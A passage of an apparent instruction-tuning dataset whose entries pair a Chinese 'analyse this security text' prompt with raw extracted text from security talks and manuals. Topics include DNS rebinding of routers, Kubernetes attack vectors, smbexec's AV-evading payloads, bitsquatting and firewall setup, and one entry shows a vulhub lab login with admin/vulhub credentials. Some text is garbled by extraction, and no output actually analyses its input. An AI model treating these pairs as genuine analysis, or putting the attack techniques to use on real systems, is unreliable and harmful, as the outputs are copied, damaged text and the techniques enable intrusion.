\"damage\" or - causing \"damage and loss\"  Trafficking in passwords or other authorization methods  Threatening to damage a computer (extortion) The biggest problem The CFAA prohibits, among other things, intentionally access[ing] a computer without authorization or in excess of authorization, and thereby obtain[ing] . . . information from any protected computer. 18 U.S.C.  1030(a)(2)(C) The biggest problem The CFAA prohibits, among other things, intentionally access[ing] a computer without authorization or in excess of authorization, and thereby obtain[ing] . . . information from any protected computer. 18 U.S.C.  1030(a)(2)(C) Wha...? What makes access without authorization?  Breaching a technological barrier meant to restrict access?  Using unanticipated or novel technical means to access?  Accessing for an improper purpose? Penalties  Both civil and criminal.  Basic unauthorized access is a misdemeanor, but the statute has broad felony liability when: o the illegal act is committed with intent to profit o information obtained is worth more than $5,000 o act is in furtherance of a fraud, or o repeat offense. E", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmac 0x00 scheme 0x01 macdefault application default application 2.pypython launchpython windows Uniform Type Identifier https://en.wikipedia.org/wiki/Uniform_Type_Identifier https://developer.apple.com/library/archive/documentation/Miscellaneous/Reference/UTIRef/Articles/System- DeclaredUniformTypeIdentifiers.html 0x02 /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/ lsregister -dump > dumpfile dumpfiledumpfile vimdumpfileshell-scrip shell.sh.bashjs javawebstartjnlp wfox.command.tool iterm2 iterm2utischeme.its.itr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCatching)Malware)En)Masse):)DNS)and)IP)style! ! Dhia!Mahjoub!dhia@opendns.com!@DhiaLite!! Thibault!Reuille!thibault@opendns.com!@ThibaultReuille!! Andree!Toonk!andree@opendns.com!@atoonk!!!! Part!1:!Catching!Malware!DNS!style! !FasFlux!botnets!as!proxy!networks! Part!2:!Catching!Malware!IP!style! !ASN!graph! !Suspicious!sibling!ASNs! !DetecJng!sibling!ASNs!through!BGP!outages! !DetecJng!Malicious!IP!ranges! !DetecJng!Malicious!subdomains!under!compromised! domains! Part!3:!Visualizing!knowledge!with!our!3D!engine! !OpenGraphiJ! !SemanJc!Nets! !ParJcle!Physics! Conclusion! Part!1:! ! Catching!Malware!DNS!style! ! ! Background! AQackers!seek!to!keep!their!operaJons!online!at!all!Jmes! The!Network!=!the!hosJng!infrastructure!is! ) ) ) )CRUCIAL) ! Spam! Phishing! Malware!distribuJon! Botnets! Fast!flux!botnets! Fast!flux!botnets!serving!as!proxy!networks! Extra!evasion/protecJon!layer!for!actual!CnCs! Infected!hosts!<Y>!FF!proxy!network!<Y>!Backend!CnCs! Usages!of!proxy!network:! YServe!malware!pushed!from!CnCs!down!to!infected!clients! (via!driveYby,!spam,!etc.)! YForward!communicaJon!from!infected!clients!to!CnCs! e.g.!Kelihos!TTL!0,!zbot!TTL!150! Zeus!Crimeware! YControl!panel! YConfig!files!(contains!urls!for:!drop!zone,!extra!payload,!extra! configs,!target!websites!for!web!injects)! YBinary!files! YBuilder! CharacterisJcs:! YSteals!financial!data:!online!bank!account!info,!credit!card! YSteals!sensiJve!credenJals! YWeb!injects! Zeus!CnCs! YCompromised!sites! YBulletproof!or!free!hosJng! YFast!flux!botnet! ! CnC!domains!used!for!3!types!of!purposes:! YServe!configuraJon!files! YServe!binary!files! YDrop!zones! Zbot!proxy!network! Fast!flux!domains!with!TTL!=!150!sec!sharing!same!infected! hosts!infrastructure! ! DetecJon!methods:! 1) Periodic!batch!pig!job! 2) IP!harvesJng!+!streaming!auth!DNS!+!filtering!heurisJcs! ! ! DetecJon!methods!(1)! YPeriodic!Pig!job!to!retrieve!domains!with!TTL!=!150!from! authoritaJve!logs! YFilter!out!noise!domains!such!as!spam,!legiJmate!domains! k", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFLAWFINDER(1) Flawfinder FLAWFINDER(1) NAME flawfinder  lexically find potential security flaws (\"hits\") in source code SYNOPSIS flawfinder [help|h] [version] [listrules] [allowlink] [followdotdir] [nolink] [patch=filename|P filename] [inputs|I] [ minlevel=X | m X ] [falsepositive|F] [neverignore|n] [regex=PA TTERN | e PA TTERN] [context|c] [columns|C] [csv] [dataonly|D] [html|H] [immediate|-i] [single- line|S] [omittime] [quiet|Q] [loadhitlist=F] [savehitlist=F] [diffhitlist=F] [] [ source code file or source root directory ]+ DESCRIPTION Flawfinder searches through C/C++ source code looking for potential security flaws. To run flawfinder, simply give flawfinder a list of directories or files. For each directory given, all files that have C/C++ file- name extensions in that directory (and its subdirectories, recursively) will be examined. Thus, for most projects, simply give flawfinder the name of the source codes topmost directory (use . for the current directory), and flawfinder will examine all of the projects C/C++ source code. Flawfinder does not require that you be able to build your software, so it can be used even with incomplete source code. If you only want to have changes reviewed, save a unified diff of those changes (created by GNU \"diff -u\" or \"svn diff\" or \"git diff\") in a patch file and use the patch (P) option. Flawfinder will produce a list of hits (potential security flaws, also called findings), sorted by risk; the riskiest hits are shown first. The risk level is shown inside square brackets and varies from 0, very little risk, to 5, great risk. This risk level depends not only on the function, but on the values of the parameters of the function. For example, constant strings are often less risky than fully variable strings in many contexts, and in those contexts the hit will have a lower risk level. Flawfinder knows about gettext (a common library for internationalized programs) and will treat constant strings passed through gettext as though they were constant strings; this", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# CCLS (forensics, 31 solved, 146p) ``` Ray said that the challenge \"Leaf-Similar Trees\" from last LeetCode Weekly was really same-fringe problem and wrote it in the form of coroutine which he learned from a Stanford friend. Can you decrypt the cache file dumped from a language server without reading the source code? The flag is not in the form of rwctf{} because special characters cannot be used. ``` In the task we get some [binary data](fringe.cc.blob) which turns out to be an index file from CCLS language server, generated for some source code. In short, this is an index file used to provide code-completion in some compatible code editors. As a result this file contains some meta-information about the source code it was generated for. Reading the blob is hard, so we used a short code to transcribe this to a `json` format, which is also supported in CCLS: ```c int main(int argc, char** argv) { std::ifstream input(\"fringe.cc.blob\"); std::string data; input.seekg(0, std::ios::end); int size = input.tellg(); data.reserve(size); input.seekg(0, std::ios::beg); data.assign((std::istreambuf_iterator<char>(input)), std::istreambuf_iterator<char>()); auto ptr = Deserialize(SerializeFormat::Binary, \"bleh.cc\", data, \"<empty>\", std::nullopt); if (ptr.get() == nullptr) { std::cerr << \"Error! Deserialize\"; return -1; } std::cout << ptr->ToString(); return 0; } ``` As a result we got a nice [json file](fringe.json). This file was much easier to read, but still flag was no-where to be seen. Initially we were afraid that the goal is to reconstruct the source code, based on the index information (eg. where certain functions and variables appear), and flag will be provided as `result` of the code. This was even more probable when one of variables had: ```json { \"usr\": 7704954053858737267, \"detailed_name\": \"int b\", \"qual_name_offset\": 4, \"short_name_offset\": 4, \"short_name_size\": 1, \"hover\": \"\", \"comments\": \"flag is here\", \"declarations\": [], \"spell\": \"16:80-16:81|1935187987660993811", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow to Hack Millions of Routers Craig Heffner, Seismic LLC SOHO RouterSecurity? Common Attack Techniques  Cross Site Request Forgery  No trust relationship between browser and router  Cant forge Basic Authentication credentials  Anti-CSRF  Limited by the same origin policy  DNS Rebinding  Rebinding prevention by OpenDNS / NoScript / DNSWall  Most rebinding attacks no longer work  Most Multiple A Record Attack  Better known as DNS load balancing / redundancy  Return multiple IP addresses in DNS response  Browser attempts to connect to each IP addresses in order  If one IP goes down, browser switches to the next IP in the list  Limited attack  Can rebind to any public IP address  Cant rebind to an RFC1918 IP addresses Rebinding to a Public IP 1.4.1.4 2.3.5.8 Target IP: 2.3.5.8 Attacker IP: 1.4.1.4 Attacker Domain: attacker.com Rebinding to a Public IP 1.4.1.4 2.3.5.8 What is the IP address for attacker.com? Rebinding to a Public IP 1.4.1.4 2.3.5.8 1.4.1.4 2.3.5.8 Rebinding to a Public IP 1.4.1.4 2.3.5.8 GET / HTTP/1.1 Host: attacker.com Rebinding to a Public IP 1.4.1.4 2.3.5.8 <script></script> Rebinding to a Public IP 1.4.1.4 2.3.5.8 GET / HTTP/1.1 Host: attacker.com Rebinding to a Public IP 1.4.1.4 2.3.5.8 TCP RST Rebinding to a Public IP 1.4.1.4 2.3.5.8 GET / HTTP/1.1 Host: attacker.com Rebinding to a Public IP 1.4.1.4 2.3.5.8 <html></html> Rebinding to a Private IP 1.4.1.4 Target IP: 192.168.1.1 Attacker IP: 1.4.1.4 Attacker Domain: attacker.com 192.168.1.1 Rebinding to a Private IP 1.4.1.4 What is the IP address for attacker.com? 192.168.1.1 Rebinding to a Private IP 1.4.1.4 1.4.1.4 192.168.1.1 192.168.1.1 Rebinding to a Private IP 1.4.1.4 GET / HTTP/1.1 Host: attacker.com 192.168.1.1 Rebinding to a Private IP 1.4.1.4 <html></html> 192.168.1.1 Services Bound to All Interfaces # netstat l Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:80 *:* LISTEN tcp 0 0 *:53 *:* LISTEN tcp 0 0 *:22 *:* LISTEN tcp 0 0", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n<!-- ~ Licensed to the Apache Software Foundation (ASF) under one ~ or more contributor license agreements. See the NOTICE file ~ distributed with this work for additional information ~ regarding copyright ownership. The ASF licenses this file ~ to you under the Apache License, Version 2.0 (the ~ \"License\"); you may not use this file except in compliance ~ with the License. You may obtain a copy of the License at ~ ~ http://www.apache.org/licenses/LICENSE-2.0 ~ ~ Unless required by applicable law or agreed to in writing, ~ software distributed under the License is distributed on an ~ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY ~ KIND, either express or implied. See the License for the ~ specific language governing permissions and limitations ~ under the License. --> <!DOCTYPE HTML> <html> <head> <title>Getting Started: Serving Web Content</title> <!--/*/ <th:block th:include=\"fragments/head :: head\"/> /*/--> </head> <body> <div class=\"container\"> <div class=\"row\"> <div class=\"col-md-4 col-md-offset-4\"> <p>Here are a few sample accounts to play with from the text-based Realm</p> <table class=\"table\"> <thead> <tr> <th>Username</th> <th>Password</th> <th>Roles</th> </tr> </thead> <tbody> <tr> <td>admin</td> <td>vulhub</td> <td>admin</td> </tr> </tbody> </table> </div> </div> <div class=\"row\"> <div class=\"col-md-4 col-md-offset-4\"> <div class=\"panel panel-default\"> <div class=\"panel-heading\"> <h3 class=\"panel-title\">Login</h3> </div> <div class=\"panel-body\"> <form name=\"loginform\" action=\"\" method=\"POST\" accept-charset=\"UTF-8\" role=\"form\"> <fieldset> <div class=\"form-group\"> <input class=\"form-control\" placeholder=\"Username or Email\" name=\"username\" type=\"text\"/> </div> <div class=\"form-group\"> <input class=\"form-control\" placeholder=\"Password\" name=\"password\" type=\"password\" value=\"\"/> </div> <input class=\"btn btn-lg btn-success btn-block\" type=\"submit\" value=\"Login\"/> </fieldset> </form> </div> </div> </div> </div> </div> <!-- jQuery (necessary for Bootstra", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInfiltrate Your Kubernetes Cluster Kubernetes in Attacker View Zhaoyan Xu Principle Research Engineer Palo Alto Networks May 29, 2019 Tongbo Luo Chief AI Secruity Scientist JD.com Agenda Background Security Features of Kubernetes Attack Vectors Lateral Movement Practices Questions Background  Kubernetes becomes popular worldwide  All mainstream cloud provider their K8s cluster, such as AKS/EKS/GKE, etc.  According to iDatalabs[1] report, around 3,804 companies use K8s for their web application deployments  Yearly user growth rate over 150%  How secure is K8s?  Is K8s vulnerable to traditional attacks?  What are new attack vectors for K8s clusters?  How to conduct penetration test on your K8s cluster? Essentials of Containerized Microservice Service Mesh Layers Istio Linkerd Orchestrator Layers K8s Openshift Container Application Layers Docker Kata Container Rkt Essentials of K8s Server-side Components: api-server: central server Controller-manger Scheduler Authentication/Authorization/Admission Control etcd: kv store Client-side Components: kubelet: install on each host/virtual host kubeproxy: traffic management/redirection Terminology in K8s World Pod: minimal unit for service schedule, containing one or more containers. Deployment: bundle for one web application, such as combining db, frontend and backend server together. Service: interface to expose your web application. Service Accounts: user account in K8s. Role/Rolebinding: role-based access control in K8s. Agenda Background Security Features of Kubernetes Attack Vectors Lateral Movement Practices Questions Overview of K8s Security Features(v1.12.7) Isolation Pod-level Isolation Network Security Policy for Namespace Isolation Authentication HTTPs for all Traffic Token, Client certificates, third-party Authentication Authorization Role-based Access Control Admission Control (for pod, deployment, etc) Pre-shipped Admission Control Pod Security Policy Pod Security Policy cont Illustration of Built-in Security Fea", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nChristopher Pogue is the Managing Consultant of the SpiderLabs Incident Response and Digital Forensics team. Having served as a US Army Signal Corps Warrant Officer, he worked on digital forensic invesIgaIons and as Cyber Security Instructor. Pogue joined the IBM Internet Security Systems (ISS) X-Force aPer leaving the military. As a PenetraIon Tester and Forensic InvesIgator with IBM, he performed over 300 penetraIon tests and 50 invesIgaIons. In his role with SpiderLabs, Pogue leads the team that performs invesIgaIons all over the United States, Central and South America, and the Caribbean Islands. He also assists local, state, and federal law enforcement agencies with cases involving digital media. Tim MaleIc is a Senior Security Consultant within the PenetraIon TesIng team at Trustwave's SpiderLabs. Tim has been working in IT since the birth of the web, and has been focused full-Ime on informaIon security since 2001. Prior to joining Trustwave, Tim held posiIons as Senior UNIX Engineer, Senior Security Engineer, and InformaIon Security Officer. 1 7/29/12 Trustwave SpiderLabs DEF CON 20 Welcome! Were very excited to have this opportunity to share some ideas about pushing incident response, forensics, and penetraIon tesIng to the next level. We are honored, and humbled, to present to a DEF CON audience. Our mission is to inspire network defenders and a`ackers to work more closely together to make each other be`er. Well finish off the session with a giant group hug and a few rounds of Kum ba ya!  But first were going to introduce ourselves and our methods and the problems we see ourselves trying to address. Well then give a quick, advanced introducIon to the forensics methodology we call Sniper Forensics. Well follow that up with our contribuIons to what were calling the Real-World PenetraIon TesIng movement. Next were going to show how we are applying these ideas in context by stepping through some sample a`acks that do and do not exemplify our methods. Then well wrap-up", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMAELSTROM Shane Steiger Attack Lifecycle Game Concept version .8  2016 Are You Playing with a Full Deck? #cybermaelstrom github.com/maelstromthegame MAELSTROM: AN ATTACK LIFECYCLE GAME CONCEPT Maelstrom is a game concept and model meant to enable Education, Demonstration and Evangelism within Cyber Security disciplines. The game concept is intended to span from the 8th grade levels to the cyber security Ninja (locked in his moms basement). It is based on the Lockheed Martin Kill Chain Attack Lifecycle. The game also borrows concepts from several MITRE Frameworks, attack patterns mapped from previous cyber campaigns and from real cyber security life. The Attackers goal is to reach a progressive Action on Objective. The Defenders will play cards, tactics and strategies to prevent this progression. Pick your side, pick your Actor and pick your Act on Objective, buy or build your own cards. Hope you dont lose! Are You Playing with a Full Deck? OFFICIAL RULES CONTENTS: Include a game board (Figure 1), initial game cards for the red Attacker Deck, a blue Defender Deck (Figure 2), a green Act on Objective Deck, (optional Expansion packs of build your own not shown), 2 dice, 9 Actor poker chip game pieces, tablets, pens and money. Figure 1 MAELSTROM Game Board Anatomy of the Maelstrom board consists of multiple stages of an Attack Lifecycle (Lockheed Martin based in this case) where the start position for the Attacker is Reconnaissance. The 6 dots between phases indicate positions. Reconnaissance, Weaponization, Delivery, Exploit, Install, Command and Control (C2), Act on Objects are each phases in which on the appropriately labeled cards can be played. GAME SETUP FIRST: Pick how many players Attackers SECOND: Attacker picks or draws their Threat Actor: Pick from (12): LIST  State Actor, Ware Fighter, Freelance Spy, Script Kiddies, Political/Social, Insider Threat, Hacktivist, Disgruntled Employee, Corporate Spy, Criminal Organization, Criminal Freelance, Joker Attacker doe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nProprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. Getting the goods with smbexec Eric Milam  Brav0hax Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. Dont you know who I am?  Attack & Pen -> Accuvant LABS  Open Source Projects -> easy-creds, smbexec, Kali Linux Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. What is smbexec? What does it do? Why should I care?  Theres nothing 0 day here! BOO!  Yes, but automation is awesome!  You can use this tool immediately  It will make post-exploitation much easier Whats this all about? Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved.  Bash script, yes, a bash script  1 week of work, consuming a years worth of Mountain Dew  Power of the tool lies in smbclient & winexe  smbclient to get/put files  winexe to execute What is smbexec? Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved.  Standard msf payloads with psexec module kept getting popped by AV  Custom exes also popped because AV trigger is on injection (service protection)  Damn you trend micro, but thanks for the motivation  Blog post from Carnal0wnage  Upload and execute your payload Why write smbexec? Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. I want my shells and I want them now!  Creates an obfuscated payload that will bypass most commercial AV  Creates a Metasploit rc file and launches a Metasploit listener to make things easy. What have you done for me lately? Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. What? You can get all this great stuff with winexe and native windows commands? Going Native Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserv", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow You Can Buy AT&T, T-Mobile, and Sprint Real-Time Location Data on the Black Market Joseph Cox, DEF CON 27 There is a new bail bond database company that is geo tracking people. People are reselling o the wrong people. Call me [REDACTED] Id rather explain it telephonically. I know a ton about the subject and the industry. Many peoples rights are being violated Id rather explain it telephonically. I know a ton about the subject and the industry. Many peoples rights are being violated Wed like to test the ping if I give you one of our own US numbers, would that work to test? Id rather explain it telephonically. I know a ton about the subject and the industry. Many peoples rights are being violated Wed like to test the ping if I give you one of our own US numbers, would that work to test? If you are paying the 300 sure Id rather explain it telephonically. I know a ton about the subject and the industry. Many peoples rights are being violated Wed like to test the ping if I give you one of our own US numbers, would that work to test? If you are paying the 300 sure So the number is [REDACTED]. When do you think it will be doable? Id rather explain it telephonically. I know a ton about the subject and the industry. Many peoples rights are being violated Wed like to test the ping if I give you one of our own US numbers, would that work to test? If you are paying the 300 sure So the number is [REDACTED]. When do you think it will be doable? Ok let me figure this out You know more about location data, or anything else you think should be published? Signal: +44 20 8133 5190 Wickr: josephcox Jabber: jfcox@jabber.ccc.de Email: joseph.cox@vice.com  How our source bought that location data  How our source bought that location data  The supply chain of location data, and the different roles companies play in it  How our source bought that location data  The supply chain of location data, and the different roles companies play in it  Leaked documents which show the scale of this loc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ndig === 域名查询工具 ## 补充说明 **dig命令** 是常用的域名查询工具可以用来测试域名系统工作是否正常 ### 语法 ```shell dig(选项)(参数) ``` ### 选项 ```shell @<服务器地址>指定进行域名解析的域名服务器 -b<ip地址>当主机具有多个IP地址指定使用本机的哪个IP地址向域名服务器发送域名查询请求 -f<文件名称>指定dig以批处理的方式运行指定的文件中保存着需要批处理查询的DNS任务信息 -P指定域名服务器所使用端口号 -t<类型>指定要查询的DNS数据类型 -x<IP地址>执行逆向域名查询 -4使用IPv4 -6使用IPv6 -h显示指令帮助信息 ``` ### 参数 * 主机指定要查询域名主机 * 查询类型指定DNS查询的类型 * 查询类指定查询DNS的class * 查询选项指定查询选项 ### 实例 ```shell [root@localhost ~]# dig www.baidu.com ; <<>> DiG 9.10.6 <<>> www.baidu.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 57295 ;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;www.baidu.com. IN A ;; ANSWER SECTION: www.baidu.com. 963 IN CNAME www.a.shifen.com. www.a.shifen.com. 63 IN A 180.101.50.242 www.a.shifen.com. 63 IN A 180.101.50.188 ;; Query time: 14 msec ;; SERVER: 119.29.29.29#53(119.29.29.29) ;; WHEN: Wed May 10 16:16:36 CST 2023 ;; MSG SIZE rcvd: 101 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ufw --- ## 安装 ```bash sudo apt update && sudo apt install ufw ``` ## 配置及使用 默认情况下ufw 的配置文件在 `/etc/default/ufw` 然后用户定义的防火墙规则文件会存在 `/etc/ufw/*.rules` 和 `/lib/ufw/*.rules` UFW 默认允许所有出站连接拒绝所有入站连接 ``` sudo ufw default deny incoming sudo ufw default allow outgoing ``` **允许管理 IPv6** ```diff sudo vim /etc/defaulf/ufw ++ IPV6=yes ``` **允许 SSH 连接** ```bash sudo ufw allow ssh # 等价于 sudo ufw allow 22 # 如果修改了SSH连接端口记住相应的允许端口连接 ``` **允许 HTTP/HTTPS** ```bash sudo ufw allow http # 等价于 sudo ufw allow 80 sudo ufw allow https sudo ufw allow 443 ``` 默认情况下 ufw allow 不加 in 是指允许入站连接如果要允许出站加上 out ``` sudo ufw allow in port sudo ufw allow out port ``` **允许指定端口的协议** ```bash sudo ufw allow ftp # 等价于 sudo ufw allow 21/tcp ``` **允许指定范围的端口连接和协议** ```bash sudo ufw allow 6000:6005/tcp sudo ufw allow 7000:7005/udp ``` **允许指定的IP连接** 默认情况下相应的端口允许所有 IP 连接通过 from 指定允许某 IP 的连接 ```bash sudo ufw allow from 123.45.67.89 sudo ufw allow from 123.45.67.89 to any port 22 ``` 如果要允许子网的连接 ```bash sudo ufw allow from 15.15.15.0/24 sudo ufw allow from 15.15.15.0/24 to any port 22 ``` **拒绝连接** ```bash # 和允许连接一样只要将相应的 allow 换成 deny 即可 sudo ufw deny from 123.45.67.89 ``` **查看规则** ```bash sudo ufw status numbered ``` **删除规则** ```bash # 每条规则前都有一个序号 sudo ufw delete [number] sudo ufw delete allow http # 等价于 sudo ufw delete allow 80 ``` **查看 UFW 状态** ```bash sudo ufw status verbose sudo ufw show added ``` **启用禁用 UFW** ```bash sudo ufw enable sudo ufw disable # ufw 默认会开机启动如果没有手动设置 sudo systemctl start ufw sudo systemctl enable ufw ``` **启用日志** ```bash sudo ufw logging on sudo ufw logging off sudo ufw logging low|medium|high # 指定日志级别 日志文件在 /var/log/ufw.log ``` **重置防火墙** ```bash sudo ufw reset # 这条命令将禁用 ufw并删除所有定义的规则,默认情况下 ufw 会备份规则 ``` --- ## Source & Reference - [Linux 下的防火墙 ufw](http://einverne.github.io/post/2018/04/ufw.html)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBITSQUATTING DNS HIJACKING WITHOUT EXPLOITATION ARTEM DINABURG DEFCON 19 About Me J The Problem Affected PlaHorms Low Skill Cheap Bitsquatting Like typosquaPng, but for bits TyposquaPng There are 1500 daily DNS requests per person. Humans type 3 of them. 1 0 0 1 01100011 01101110 01101110 01100011 01101111 01101110 01100011011011100110111000101110011000110110111101101101 01100011011011110110111000101110011000110110111101101101 C N N . C O M C O N . C O M Heat CAUSES OF BIT-ERRORS: iPhone OperaXng Temperature 0 20 40 60 80 100 120 Temperature (F) Las Vegas Montreal iPhone CAUSES OF BIT-ERRORS: Electrical Problems CAUSES OF BIT-ERRORS: Defects CAUSES OF BIT-ERRORS: Cosmic Rays 10000 - 1/4 5X lOX Fail rate - Cosmic ray flux  1/2 IBM Journal of Research and Development, vol. 40, no. 1, page 13 Lets talk about DRAM 1 10 100 1000 10000 100000 \"ultra low\" failure rates 160GBits of DRAM 1Gbit 0.25 micron 256MBytes 32 Gbits of DRAM (Cray YMP-8) Mfg 1, 1GB DIMM Mfg 1, 2GB DIMM Mfg 1, 4GB DIMM Mfg 2, 1GB DIMM Mfg 2, 2GB DIMM Mfg 3, 1GB DIMM Mfg 4, 1GB DIMM Mfg 5, 2GB DIMM Mfg 6, 2GB DIMM Mfg 6, 4GB DIMM Micron EsXmate (256 Mbytes) Nite Hawk some 0.13 micron SRAM and DRAM Failures in Test (FIT, Logarithmic Scale) DRAM Failure Rates For a PC with 4GiB of DRAM, error esDmates range from to . 600 PiB Experiment: Step 1 ikamai.net aeazon.com a-azon.com amazgn.com microsmft.com micrgsoft.com miarosoft.com iicrosoft.com microsnft.com mhcrosoft.com eicrosoft.com mic2osoft.com micro3oft.com doublechick.net do5bleclick.net doubleslick.net li6e.com 0mdn.net 2-dn.net 2edn.net 2ldn.net 2mfn.net 2mln.net 2odn.net 6mdn.net fbbdn.net fbgdn.net gbcdn.net fjcdn.net dbcdn.net roop-servers.net gmaml.com Experiment, Step 2 ! \" !\"#$%&'()(*+,&($ !-#$%&.()(*+,&($ /01,/12,'3',/44 !-#$%&'()(*+,&($ /01,/12,'3',/44 N Experiment, Step 3 ! \" !\"#$%$&##'%()( &*+,-$./01*+*2,)0*. &##'%()($343$56#$76859 N 0 200 400 600 800 1000 1200 1400 1600 1800 26-Sep-10 3-Oct-10 10-Oct-10 17-Oct-10 24-Oct-10 31-Oct-10 7-Nov-", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSHAREENUM: WE WRAPPED SAMBA SO YOU DONT HAVE TO Lucas Morris @lucasjmorris Michael McAtee @michael.mcatee About Us Lucas Morris Manager at Crowe Horwath LLP Manager, Pentester, Code Monkey Michael McAtee Senior Consultant at Crowe Horwath LLP Pentester, SysAdmin, [something funny here] About Us Lucas Morris => emperorcow@gmail.com => @lucasjmorris => github.com/emperorcow Michael McAtee => jmmcatee@gmail.com => @michaelmcatee => github.com/jmmcatee https://github.com/emperorcow/shareenum Overview SMB / CIFS Refresher Windows Permissions Refresher (DACLs, SDDL, ACEs, etc.) The Problem With Scanning Today What Share Scanning Is Good For Tools! Windows File Sharing CIFS Basically SMB 1.0 Mostly open & is the published spec that others implement to SMB SMB 1.0: Windows XP, Server 2003 R2, & Prior SMB 2.0: Windows Vista, Server 2008, & Above SMB 2.1: Windows 7, Server 2008 R2, & Above SMB 3.0: Windows 8, Server 2012, & Above SMB 3.02: Windows 8.1, Server 2012 R2 Types of Shares Special Types of Shares (IPC$, ADMIN$, C$) $ = Hidden usually IPC$ = InterProcess Communication ADMIN$ = C:\\Windows\\System32 C$, D$, etc. = Drive Shares These are default an rarely removed Although you can disable them (http://support.microsoft.com/kb/954422) Shares - Permissions Discretionary Access Control List (DACL) REVISION:1,OWNER:2K8-WIN7-01\\ShareEnumUser1, GROUP:PROD\\Domain Users, ACL:2K8\\shareenumdomuser1:0/16/0x001f01ff Access Control Entry (ACE) BUILTIN\\Administrators:0/0/0x001f01ff Shares - Permissions Shares Read View files & folders View files & folder contents Change Add files & folders Change data in files Delete folders and files Full Control Change NTFS permissions NTFS Full Control Modify Read & Execute List Folder Contents Read Write Special Permissions  Shares - Permissions Shares - Permissions Special Permissions Traverse Folder/Execute File List Folder/Read Data Read Attributes Read Extended Attributes Create Files/Write Data Create Folders/Append Data Write Attributes Write", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nD E F C O N 1 3 Windows vs FreeBSD vs Linux Windows vs FreeBSD vs Linux Or: Why Deploying Linux in your Environment is Suicide D E F C O N 1 3 Dont Believe Anything I Say Dont Believe Anything I Say  \"Do not believe in anything simply because you have heard it. Do not believe in anything simply because it is spoken and rumored by many. Do not believe in anything simply because it is found written in your religious books. Do not believe in anything merely on the authority of your teachers and elders. Do not believe in traditions because they have been handed down for many generations. But after observation and analysis, when you find that anything agrees with reason and is conducive to the good and benefit of one and all, then accept it and live up to it. - Buddha  Daytime - Security consultant  Beltway bandit in Linthicum MD  Night - Founder of the Shmoo Group, Capital Area Wireless Network, periodic author D E F C O N 1 3 For Your Safety and The Safety of Those Around You For Your Safety and The Safety of Those Around You Linux Zealots Linux Zealots Windows / BSD / Others Windows / BSD / Others  This talk may be not much more than flamebait  You may be reminded of a /. Discussion  This talk is meant to be interactive D E F C O N 1 3 Lets Talk about Security Lets Talk about Security  For the feds, Information Assurance  Tactical Coding Error vs Design Flaw  Script kiddie vs Dedicated Attacker  Host Hardening vs Long term operational security D E F C O N 1 3 Long term Operational Security Long term Operational Security  Often overlooked aspect of security  We are not an end in and of ourselves.  Further, an IDS does not operational security make  Any idiot can be trained to secure a host  Look at all the security books on the shelf  Running a long term secure enterprise is the tough thing D E F C O N 1 3 Enter Rant Mode Enter Rant Mode D E F C O N 1 3 Potters Pyramid of IT Security Needs Potters Pyramid of IT Security Needs IDS Patch Mgt Op. Procedures Firewalls Auth", "category": "text_analysis", "source": "security_papers"}
